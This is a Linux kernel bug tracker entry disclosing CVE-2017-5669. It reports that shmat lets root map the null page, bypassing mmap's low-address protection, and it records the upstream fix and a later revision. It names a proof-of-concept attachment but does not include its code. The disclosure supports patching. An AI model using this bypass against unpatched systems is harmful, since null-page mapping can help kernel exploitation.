Bug 192931 - Shmat allows mmap null page protection bypass
Summary: Shmat allows mmap null page protection bypass
Alias: None
Product: Memory Management
Classification: Unclassified
Component: Other (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: Andrew Morton
Depends on:
Reported: 2017-01-20 05:03 UTC by Gareth Evans
Modified: 2020-07-27 10:48 UTC (History)
3 users (show)

See Also:
Kernel Version: 4.4.0-57-generic
Regression: No
Bisected commit-id:

Proof of Concept (1.23 KB, text/x-csrc)
2017-01-20 05:03 UTC, Gareth Evans

Description Gareth Evans 2017-01-20 05:03:33 UTC
Created attachment 252511 [details]
Proof of Concept

The null page protection mechanisms implemented in shmat are not consistent with those in mmap and allow a privileged user to map the null page. When a privileged user attempts to mmap an address below 64k, it is treated as essentially passing a NULL value in the addr argument and returns a random address. With shmat, the root user is simply provided the address they requested, essentially bypassing this protection afforded by mmap. Please see attached proof of concept code.
Comment 1 Gareth Evans 2017-02-03 12:17:11 UTC
This bug has been assigned CVE-2017-5669
Comment 2 Gareth Evans 2017-02-21 13:55:24 UTC
This issue has been resolved in Linux v4.11 https://git.kernel.org/cgit/linux/kernel/git/next/linux-next.git/commit/?id=e1d35d4dc7f089e6c9c080d556feedf9c706f0c7
Comment 3 Emily 2020-07-27 10:48:16 UTC
Just to note the above fix was reverted/adjusted in
v4.17-rc7 to only fail in the presence of the SHM_REMAP flag.


New patch direct link:

Note You need to log in before you can comment on or make changes to this bug.